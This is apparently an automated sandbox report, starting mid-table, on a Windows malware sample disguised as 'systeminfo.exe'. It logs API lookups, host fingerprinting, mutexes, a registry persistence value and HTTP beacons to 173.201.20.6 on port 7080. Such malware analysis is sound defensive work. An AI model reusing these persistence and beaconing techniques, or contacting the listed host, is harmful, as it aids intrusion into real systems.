1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74ee6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x74e41700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x74e6828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x74e44435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x74e45929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x74e63102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x74e454ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x74e44442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x74e41245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x74e414b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x74e5b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x74ec42ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74e45a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74e5eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74e411c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74e414e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x76ffe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74e414c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74e411a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74e41809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74e411f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7506ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74dba4b4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74ec3f49 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:19:40 (Local Time) |
|
5 | |
| Get Time | type = Ticks, time = 13384 |
|
4 | |
| Get Time | type = Local Time, time = 2017-11-28 18:19:41 (Local Time) |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 |
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:20 |
| Information | Value |
|---|---|
| PID | 0x79c |
| Parent PID | 0x5d8 (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7A0
0x
7A4
0x
318
0x
760
0x
7D4
0x
794
0x
790
0x
78C
0x
784
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000c1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x000dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x000edfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000fdfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d4fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
|
| systeminfo.exe | 0x00360000 | 0x0037dfff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x00360000 | 0x0039bfff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x00360000 | 0x0039bfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000360000 | 0x00360000 | 0x00364fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| windowsshell.manifest | 0x00360000 | 0x00360fff | Memory Mapped File | Readable |
|
|
|
|
| index.dat | 0x00360000 | 0x0036bfff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000370000 | 0x00370000 | 0x00371fff | Pagefile Backed Memory | Readable |
|
|
|
|
| index.dat | 0x00380000 | 0x00387fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x00390000 | 0x0039ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| systeminfo.exe | 0x003d0000 | 0x003eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x0069efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00867fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01e00000 | 0x020cefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000020d0000 | 0x020d0000 | 0x024a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002110000 | 0x02110000 | 0x0214ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002150000 | 0x02150000 | 0x0218ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000021d0000 | 0x021d0000 | 0x022cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002330000 | 0x02330000 | 0x0236ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025f0000 | 0x025f0000 | 0x0262ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002700000 | 0x02700000 | 0x027fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002800000 | 0x02800000 | 0x029affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x0293ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002970000 | 0x02970000 | 0x029affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029d0000 | 0x029d0000 | 0x02acffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02bcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002dd0000 | 0x02dd0000 | 0x02ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02fcffff | Private Memory | Readable, Writable |
|
|
|
|
| uxtheme.dll | 0x73480000 | 0x734fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x73640000 | 0x73690fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x736a0000 | 0x736d1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msacm32.dll | 0x736e0000 | 0x736f3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73700000 | 0x73707fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73710000 | 0x7376bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x73770000 | 0x737aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fwpuclnt.dll | 0x74500000 | 0x74537fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wship6.dll | 0x74540000 | 0x74545fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wshtcpip.dll | 0x74550000 | 0x74554fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winrnr.dll | 0x74560000 | 0x74567fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mswsock.dll | 0x74570000 | 0x745abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pnrpnsp.dll | 0x745b0000 | 0x745c1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| napinsp.dll | 0x745d0000 | 0x745dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| npmproxy.dll | 0x745e0000 | 0x745e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x745f0000 | 0x745fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netprofm.dll | 0x74600000 | 0x74659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x74660000 | 0x74665fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x74670000 | 0x7467ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x74680000 | 0x74685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x74690000 | 0x7469cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x746a0000 | 0x746b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x746c0000 | 0x74711fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x74720000 | 0x74726fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x74730000 | 0x7474bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x74750000 | 0x74793fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x747a0000 | 0x747c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x747d0000 | 0x7496dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74970000 | 0x749aafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749b0000 | 0x749c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x749e0000 | 0x749ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x749f0000 | 0x749fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x74a00000 | 0x74a16fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74b20000 | 0x74b2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74b30000 | 0x74b8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x74b90000 | 0x74be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| normaliz.dll | 0x74c20000 | 0x74c22fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x74d00000 | 0x74d82fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x74d90000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x74e30000 | 0x74f3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x74f40000 | 0x74f84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x74f90000 | 0x7502cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75030000 | 0x75039fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75040000 | 0x7513ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x75140000 | 0x7519ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x751c0000 | 0x7531bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75320000 | 0x75f69fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x75f70000 | 0x7605ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76060000 | 0x7606bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x760f0000 | 0x761e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76250000 | 0x7636cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76370000 | 0x7643bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76440000 | 0x764cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x764d0000 | 0x7655ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76700000 | 0x76745fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76750000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x76890000 | 0x76a8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x76ac0000 | 0x76af4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76b00000 | 0x76babfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x76bb0000 | 0x76bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076bd0000 | 0x76bd0000 | 0x76cc9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76df0000 | 0x76f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76fa0000 | 0x76fa5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76fd0000 | 0x7714ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
|
For performance reasons, the remaining 6 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | type = size |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write Value | - | value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ |
|
5 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x76b00000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74e30000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75040000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74d90000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 |
|
6 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20fa6c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20faa4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x76b0dbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x76b09894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x76b09cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74ee6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x74e41700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x74e6828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x74e44435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x74e45929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x74e63102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x74e454ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x74e44442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x74e41245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x74e414b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x74e5b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x74ec42ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74e45a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74e5eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74e411c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74e414e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x76ffe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74e414c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74e411a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74e41809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74e411f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7506ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74dba4b4 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
2 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:19:49 (Local Time) |
|
6 | |
| Get Time | type = Ticks, time = 21902 |
|
1 | |
| Get Time | type = Ticks, time = 21918 |
|
3 | |
| Get Time | type = Ticks, time = 23790 |
|
1 | |
| Get Time | type = Ticks, time = 28875 |
|
1 | |
| Get Time | type = Ticks, time = 29796 |
|
1 | |
| Get Time | type = Ticks, time = 30794 |
|
1 | |
| Get Time | type = Ticks, time = 31793 |
|
1 | |
| Get Time | type = Ticks, time = 32791 |
|
1 | |
| Get Time | type = Ticks, time = 33789 |
|
1 | |
| Get Time | type = Ticks, time = 34803 |
|
1 | |
| Get Time | type = Ticks, time = 35802 |
|
1 | |
| Get Time | type = Ticks, time = 36800 |
|
1 | |
| Get Time | type = Ticks, time = 37799 |
|
1 | |
| Get Time | type = Ticks, time = 38797 |
|
1 | |
| Get Time | type = Ticks, time = 39795 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
6 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 1.94 KB (1986 bytes) |
| Total Data Received | 0.76 KB (780 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 173.201.20.6 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
